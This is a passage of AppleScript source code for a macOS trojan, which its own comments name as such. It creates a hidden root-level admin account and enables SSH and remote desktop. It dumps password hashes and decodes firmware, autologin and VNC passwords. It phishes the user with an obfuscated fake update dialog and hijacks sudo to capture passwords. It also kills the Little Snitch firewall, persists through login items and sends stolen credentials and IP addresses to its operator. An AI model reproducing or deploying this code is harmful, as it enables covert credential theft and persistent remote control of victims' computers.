do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash
end try
else --For Panther and prior
try
--see if our user is already there
do shell script "niutil -readprop . /users/" & hidden_admin_username & " name"
on error number 105 -- niutil can't open directory
--if not, then add our user. niutil should use lowercase "/users/" or it will create a second one named "/Users/" which won't actually work.
do shell script "/usr/bin/sudo niutil -create . /users/'" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' uid 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' gid 20; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' shell /bin/bash; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' passwd '" & hidden_admin_password_hash & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' _writers_passwd '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' expire 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' realname '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' change 0; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' class ''; /usr/bin/sudo niutil . -append /groups/admin users '" & hidden_admin_username & "'; /usr/bin/sudo niutil . -append /groups/wheel users '" & hidden_admin_username & "'; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo niutil -createprop . /users/'" & hidden_admin_username & "' authentication_authority ';basic;'"
end try
end if
--Also add our user to the hidden user list and set showotherusers_managed to false.
try
if (do shell script "defaults read /Library/Preferences/com.apple.loginwindow HiddenUsersList 2>/dev/null; exit 0") does not contain hidden_admin_username then
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow HiddenUsersList -array-add " & hidden_admin_username
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool false"
end if
end try
end agent_86_reporting_for_duty_chief
on papers_please()
--Get current local IP addresses
if debug then log_event("papers_please")
set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")
if be_quiet is false then
--Outgoing communication will only happen if be_quiet is set to "false".
if target_DDNS_username is not "" and target_DDNS_username is not "localhost" then
try
--If you are using a Dynamic DNS service to track the computer's public IP address you may not also need to get the public IP address separately
do shell script "curl " & quoted form of target_DDNS_update_URL & " 2>&1 | grep success"
on error error_message number error_number
if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
--Wanna try a different DDNS service?
end try
else
try
--These get the public IP address
set ip_addresses to (do shell script "curl 'http://www.whatismyip.com/automation/n09230945.asp' 2>/dev/null") & " " & ip_addresses
on error error_message number error_number
if debug then log_event("papers_please:ERROR #" & error_number & " " & error_message)
set ip_addresses to (do shell script "curl http://ipid.shat.net/iponly/ | grep body | sed -e 's/^<body>//' -e 's/<.*$//'") & " " & ip_addresses
end try
end if
end if
set ip_addresses to do shell script "echo " & quoted form of ip_addresses & " | tr -s ' '"
end papers_please
on enable_ARD_and_VNC()
--This *should* work from any admin account, without sudo or root, for any version of OS X which
--includes ARD Client (server) such as 10.3, 10.4 and 10.5.
if debug then log_event("enable_ARD_and_VNC")
try
-- Disable the Remote Management menu extra.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
if OSX_version_number_minor as number ≥ 5 then --For Leopard
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -all -restart -agent"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -restart -agent -console"
end if
end try
end enable_ARD_and_VNC
on enable_ssh()
if debug then log_event("enable_ssh")
try
if i_am_an_admin then
--This *should* work from any admin account, without sudo or root, for any version of OS X which
--includes ARD Client (server) such as 10.3, 10.4 and 10.5.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if
end try
if i_have_root_access then
try
--If sudo works but I am not an admin (I might have modified /etc/sudoers)
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
--And while I'm here...
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end try
try
--This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
--Note, this also opens port 22 in the default OS X firewall
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
do shell script "/usr/bin/sudo /sbin/service ssh start"
else --For Puma and Cheetah
--Still need to also open port 22 in the firewall (ipfw)!
do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
do shell script "/usr/bin/sudo /usr/sbin/sshd &"
end if
end try
end if
end enable_ssh
on phone_home_and_try_a_different_method_if_it_fails()
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails")
if be_quiet is false then
--Outgoing communication will only happen if be_quiet is set to "false"
--Be sure to use is_it_safe and/or these_are_not_the_outgoing_network_communications_you_are_looking_for() first!
--The email will be sent to the address set in the variable masters_email_address !
--HEY! You -MUST- change the lines below to work with the specific web mail form which you are using!
--An easy way to see which method (POST as shown in this example, or GET) is used, and in what format
--the data should be submitted, and what phrase indicates success, is to use Firefox and the LiveHTTPHeaders
--extension while manually sending an email through the site's web mail form.
if debug then log_event(quoted form of webmail_command_line)
set the_message to my_username & "--" & my_password & "--" & ip_addresses & "--" & OSX_hashes
set the_message to fuxor(the_message)
set the_message to do shell script "echo " & quoted form of the_message & " | tr ' \\r\\n\\t' '+'"
set webmail_command_line to do shell script "echo " & quoted form of webmail_command_line & " | sed -e 's/<<MASTERS_EMAIL_ADDRESS>>/" & masters_email_address & "/' -e 's/<<THE_TITLE>>/" & the_title & "/' -e 's/<<THE_MESSAGE>>/" & quoted form of the_message & "/' -e 's/<<SUCCESS_RESPONSE_TERM>>/" & webmail_success_response_term & "/' "
try
if (do shell script webmail_command_line) contains webmail_success_response_term then
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: message sent successfully")
else
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: sending message failed")
end if
on error
if debug then log_event("phone_home_and_try_a_different_method_if_it_fails: error while sending message")
end try
end if
end phone_home_and_try_a_different_method_if_it_fails
on exit_stage_left()
--This next if then statement will handle moving the trojan and putting 'original.app'
--from within the trojan's app package back where the trojan had been
if debug then log_event("exit_stage_left")
if move_myself is not false then
try
do shell script "cd \"" & POSIX path of (my_POSIX_folder) & "\" ..; rm -Rf .AStht 2>/dev/null; mv -f \"" & POSIX path of (my_Path) & "\" .AStht; mv -f .AStht/Contents/original.app/ \"" & POSIX path of (my_Path) & "\"" --add; rm -Rf .AStht 2>/dev/null before the last quote to self-delete after moving
end try
try
do shell script "/usr/bin/open \"" & POSIX path of (my_Path) & "\""
end try
end if
end exit_stage_left
on whos_in_charge_here()
if debug then log_event("whos_in_charge_here")
if text of (do shell script "id" user name my_username) contains "admin" then
set i_am_an_admin to true
else
set i_am_an_admin to false
end if
end whos_in_charge_here
on dupe_user()
--Ask the user to supply a password
if debug then log_event("dupe_user")
local tries
set the_title to "Sjsbenmr2Ukqnbr2mrlcvmra2gjcm2knaaejmq."
set the_message to "A2pjmmckb2kmrsrmripr2svyr2una2orri2qrbrpbrq2niq2zcab2or2mrknvmrq.2Eibrm2gjcm
naaejmq2bj2pjibvicr:"
set tries to 0
if text of (do shell script "id" user name my_username) contains "admin" then
set i_am_an_admin to true
repeat until i_have_root_access
set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" buttons {"OK"} default button "OK" with hidden answer)
set tries to tries + 1
try
if text of (do shell script "echo $UID" user name my_username password my_password with administrator privileges) = "0" then set i_have_root_access to true
do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
on error error_message number error_number
if tries is 4 then
display dialog "An authentication error has occurred. The file could not be repaired!" buttons {"OK"} default button "OK"
return
end if
set the_message to "Iipjmmrpb2knaaejmq.2Cyvpx2Ox2bj2bmg2ntnvi."
display dialog defuxor(the_message) with title (defuxor(the_title)) buttons {"OK"} default button "OK"
end try
end repeat
else
set my_password to text returned of (display dialog (defuxor(the_message)) with icon padlock_icon with title (defuxor(the_title)) default answer "" with hidden answer)
end if
end dupe_user
on restart()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Tell the user that a restart is required.
if debug then log_event("restart")
set the_title to "Sjsbenmr2Ukqnbr"
set the_message to "Tur2ckqnbr(a)2ermr2viabnyyrq2acppraascyyg.2Yjc2aujcyq2mrabnmb2gjcm2pjzkcbrm2ije."
display dialog defuxor(the_message) with icon software_update_icon with title defuxor(the_title) buttons {"Restart"} default button "Restart"
do shell script ("/usr/bin/sudo reboot")
end restart
on fuxor(the_variable)
--Obfuscate some text
if debug then log_event("fuxor")
local the_variable
return do shell script ("echo " & quoted form of the_variable & " | tr '" & key2 & "' '" & key1 & "'")
end fuxor
on defuxor(the_variable)
--Deobfuscate some text
if debug then log_event("defuxor")
local the_variable
return do shell script ("echo " & quoted form of the_variable & " | tr '" & key1 & "' '" & key2 & "'")
end defuxor
on just_hangin_out()
--Keep checking until sudo works. Once called, the script will just sit here forever until sudo works or until it's quit.
if debug then log_event("just_hangin_out")
try
do shell script "/usr/bin/sudo cat /etc/sudoers"
on error error_message number error_number
--if error_message is not "Password:" then return ?
delay 290 -- wait 4 minutes and 50 seconds before trying again. The default sudo timeout is 5 minutes.
just_hangin_out()
end try
end just_hangin_out
on pass_the_hash()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("pass_the_hash")
local kcpassword, NATpassword, ARDVNCpassword, autoLoginUser
set kcpassword to ""
set NATpassword to ""
set ARDVNCpassword to ""
set ofpassword to ""
--This gets the password hashes for all OS X user accounts.
try
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
set OSX_hashes to do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat \"/var/db/shadow/hash/$the_hashfile\"`; ntlm_hash=\"${the_hash:0:64}\";[ \"${ntlm_hash}\" == \"${ntlm_hash/0000}\" ] && echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done"
else if OSX_version_number_minor as number = 3 then --For Panther
set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo \"${line}\";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null);sudo test -f /var/db/shadow/hash/${the_hashfile} && the_hash=$(sudo cat \"/var/db/shadow/hash/${the_hashfile}\");echo \"${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:\";echo \"${the_name}_SHA1:${the_hash:64:40}:\"; done"
else --For Jaguar and prior
set OSX_hashes to do shell script "/usr/bin/nidump passwd . | grep -v \":\\" & (ASCII character 42) & ":\" | while read line;do echo -n \"${line} \";the_name=\"${line%%:*}\" the_hashfile=$(niutil -readprop . /users/${the_name} generateduid 2>/dev/null); /usr/bin/sudo test -d /var/db/samba/hash && /usr/bin/sudo test -f /var/db/samba/hash/${the_hashfile} && /usr/bin/sudo cat \"/var/db/samba/hash/${the_hashfile}\" || echo;done"
end if
end try
do shell script "echo " & quoted form of OSX_hashes & " >> " & quoted form of hashes_file
--Get the Open Firmware password
try
set ofpassword to do shell script "IFS='%'; hexbytes=( $( /usr/bin/sudo nvram -p | grep password | cut -f 2 ) ); IFS='';for ((i=1;i<${#hexbytes[*]};i++)); do echo -en \"\\x$(printf '%x' $((16#AA^16#${hexbytes[$i]})))\";done;echo"
end try
if ofpassword is not "" then
do shell script "echo " & quoted form of ofpassword & " >> " & quoted form of candidates_file
end if
--For the autologin password stored in /etc/keychain
try
set kcpassword to do shell script "declare -i offset=0 i=0;declare -a keys=(7d 89 52 23 d2 bc dd ea a3 b9 1f) hexbytes=($(sudo hexdump -v -e '/1 \"%02X \"' /etc/kcpassword));for ((offset=0;offset<${#hexbytes[*]};offset++));do newbyte=$(printf '%02X' $((16#${keys[${i}]}^16#${hexbytes[$offset]})));[ \"${newbyte}\" == \"00\" ]&&echo&&break;echo -en \"\\x${newbyte}\";let i+=1;[ $i -gt 10 ]&&let i=0;done"
set autoLoginUser to do shell script "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser"
on error error_message number error_number
if debug then log_event("kcpassword:ERROR #" & error_number & " " & error_message)
--Either /etc/kcpassword doesn't exist (as in no autologin user is set),
--or the password does not belong to this user (we could test it with the other usernames of this system),
--or sudo failed and I could not read the /etc/keychain file.
--or the account is not allowed to use sudo.
end try
if kcpassword is not "" then
do shell script "echo " & quoted form of kcpassword & " >> " & quoted form of candidates_file
if autoLoginUser is not "" then
do shell script "echo '" & autoLoginUser & ":" & kcpassword & "' >> " & quoted form of accounts_file
end if
end if
--For the ad-hoc WiFi network password which is stored as plain text.
try
set NATpassword to do shell script "defaults read /Library/Preferences/SystemConfiguration/com.apple.nat NAT | grep NetworkPassword | sed -e 's/^.*<//' -e 's/>.*$//'"
end try
if NATpassword is not "" then
do shell script "echo " & quoted form of NATpassword & " >> " & quoted form of candidates_file
end if
--For the ARD VNC access password
try
--If /Library/Preferences/com.apple.VNCSettings.txt isn't there, create it with password 'a secret'
try
do shell script "[ ! -f /Library/Preferences/com.apple.VNCSettings.txt ] && echo -n '7614220BE8DAA096FF1C39567390ADCA' > /Library/Preferences/com.apple.VNCSettings.txt"
set ARDVNCpassword to "a secret"
return
end try
try
set ARDVNCpassword to do shell script "declare -a keys=(17 34 51 6e 8b a8 c5 e2 ff 1c 39 56 73 90 ad ca);p=$(sudo cat /Library/Preferences/com.apple.VNCSettings.txt);hexbytes=(${p:0:2} ${p:2:2} ${p:4:2} ${p:6:2} ${p:8:2} ${p:10:2} ${p:12:2} ${p:14:2} ${p:16:2} ${p:18:2} ${p:20:2} ${p:22:2} ${p:24:2} ${p:26:2} ${p:28:2} ${p:30:2});for ((offset=0;offset<${#keys[*]};offset++));do echo -en \"\\x$(printf '%02X' $((16#${keys[${offset}]}^16#${hexbytes[$offset]})))\";done"
end try
if ARDVNCpassword is not "" then
do shell script "echo " & quoted form of ARDVNCpassword & " >> " & quoted form of candidates_file
end if
end try
end pass_the_hash
on alias_sudo()
--This routine creates a shell script named ".sudo2" and then aliases the sudo command to run the shell script.
--The alias is also added to the user's .profile. Captured passwords are output to ~/Public/.howdy
if debug then log_event("alias_sudo")
do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x
75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
try
do shell script "grep 'alias sudo' ~/.profile"
on error
do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
end try
end alias_sudo
on is_it_safe()
--check if Little Snitch is running
if debug then log_event("is_it_safe")
try
do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep"
set be_quiet to true
return
end try
set be_quiet to false
end is_it_safe
on these_are_not_the_outgoing_network_communications_you_are_looking_for()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Disable Little Snitch prior to using curl
if debug then log_event("these_are_not_the_outgoing_network_communications_you_are_looking_for")
try
do shell script "ps -axww | grep -i \"lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch\" | grep -v grep | while read process and_junk; do /usr/bin/sudo kill -9 \"${process}\"; done; /usr/bin/sudo killall \"lsd\"; /usr/bin/sudo mv \"/Library/Little Snitch\" /Library/.hushnow"
set be_quiet to false
end try
end these_are_not_the_outgoing_network_communications_you_are_looking_for
on slash_x_hex(the_variable)
if debug then log_event("slash_x_hex")
local hex_characters, hexified_string, each_character, decimal_value, the_variable
set hex_characters to "0123456789ABCDEF"
set hexified_string to ""
repeat with each_character in the_variable
set decimal_value to ASCII number of each_character
set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
end repeat
return hexified_string
end slash_x_hex
on test_a_password_with_sudo(try_this_password)
if debug then log_event("test_a_password_with_sudo")
local try_this_password
try
--HEY! Note that this is going to invalidate the sudo timestamp!
--If sudo was already working, do what you need sudo for BEFORE calling this!
do shell script "/usr/bin/sudo -k; echo " & quoted form of try_this_password & " | /usr/bin/sudo -S id -u"
if result is "0" then
set i_am_an_admin to true
set i_have_root_access to true
do shell script "echo " & my_username & ":" & my_password & " >> " & quoted form of accounts_file
end if
end try
end test_a_password_with_sudo
on can_sudo_come_out_to_play()
if debug then log_event("can_sudo_come_out_to_play")
try
do shell script "/usr/bin/sudo id -u" --should fail if sudo isn't within the timeout or return "0" if it worked
set i_have_root_access to true
on error error_message number error_number
set i_have_root_access to false
end try
end can_sudo_come_out_to_play
on move_in()
--Test if I am running from /Library/Caches and if not, try to copy myself there (but only if I'm compiled)
if debug then log_event("move_in")
if my_POSIX_folder does not contain "/Library/Caches" and my_POSIX_folder is not "/Applications/AppleScript/" then
try
do shell script "ditto -X -rsrc " & quoted form of my_Path & " /Library/Caches/" & quoted form of my_name
set launch_path to "/Library/Caches/" & my_name
do shell script "chmod 777 /Library/Caches/" & quoted form of my_name
on error error_message number error_number
if debug then log_event("move_in:ERROR #" & error_number & " " & error_message)
--Couldn't copy myself into /Library/Caches/
end try
end if
end move_in
on loosen_permissions_on_SystemLoginItems()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("loosen_permissions_on_SystemLoginItems")
try
do shell script "touch /Library/Preferences/com.apple.SystemLoginItems.plist"
on error error_message number error_number
do shell script "/usr/bin/sudo chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
end try
end loosen_permissions_on_SystemLoginItems
on rerun_me_every_startup()
--Test if my launch path is listed in /Library/Preferences/com.apple.SystemLoginItems.plist and if not, try to add it (but only if I'm compiled)
if debug then log_event("rerun_me_every_startup")
try
set SystemLoginItems to do shell script "defaults read /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary"
on error error_message number error_number
if debug then log_event("rerun_me_every_startup:ERROR #" & error_number & " " & error_message)
--can't read from /Library/Preferences/com.apple.SystemLoginItems.plist, perhaps it does not yet exist
end try
if SystemLoginItems does not contain launch_path and launch_path does not contain "Script Editor.app" then
try
do shell script "touch '/Library/Preferences/com.apple.SystemLoginItems.plist'"
do shell script "defaults write /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
do shell script "chmod 777 /Library/Preferences/com.apple.SystemLoginItems.plist 2>/dev/null"
on error error_message number error_number
--can't write to /Library/Preferences/com.apple.SystemLoginItems.plist, I'll add me to the user's login items instead.
do shell script "touch ~/Library/Preferences/loginwindow.plist"
do shell script "defaults write ~/Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
do shell script "chmod 777 ~/Library/Preferences/loginwindow.plist 2>/dev/null"
end try
end if
end rerun_me_every_startup
on stuff_for_root_to_do()
--This handler needs root!
if debug then log_event("stuff_for_root_to_do")
move_in()
loosen_permissions_on_SystemLoginItems()
rerun_me_every_startup()
agent_86_reporting_for_duty_chief()
its_smoky_in_here_lets_open_ports_in_the_firewall()
enable_ssh()
install_phpshell()
enable_webserver()
enable_Personal_File_Sharing()
install_and_activate_logKext()
pass_the_hash()
i_have_a_secret()
there_are_no_osx_viruses_silly_wabbit()
i_like_you_just_as_you_are()
is_it_safe()
if be_quiet is not true then
these_are_not_the_outgoing_network_communications_you_are_looking_for()
end if
papers_please()
phone_home_and_try_a_different_method_if_it_fails()
reverse_shell()
Back_to_masters_VNC()
nothing_to_see_here()
throw_another_log_on_the_fire()
--exit_stage_left
end stuff_for_root_to_do
on stuff_for_an_admin_without_sudo_to_do()
--This is assuming that I am an admin user, I do not have a functional password and sudo is not already working
if debug then log_event("stuff_for_an_admin_without_sudo_to_do")
move_in()
rerun_me_every_startup()
enable_ssh()
install_phpshell()
i_have_a_secret()
i_like_you_just_as_you_are()
reverse_shell()
Back_to_masters_VNC()
is_it_safe()
if be_quiet is false then
papers_please()
phone_home_and_try_a_different_method_if_it_fails()
end if
--exit_stage_left()
end stuff_for_an_admin_without_sudo_to_do
on stuff_for_a_regular_user_to_do()
--This is assuming that I am a standard user, not an admin, and sudo won't work
if debug then log_event("stuff_for_a_regular_user_to_do")
move_in()
rerun_me_every_startup()
install_phpshell()
i_have_a_secret()
i_like_you_just_as_you_are()
reverse_shell()
Back_to_masters_VNC()
is_it_safe()
if be_quiet is false then
papers_please()
phone_home_and_try_a_different_method_if_it_fails()
end if
brute_user_accounts()
--exit_stage_left
end stuff_for_a_regular_user_to_do
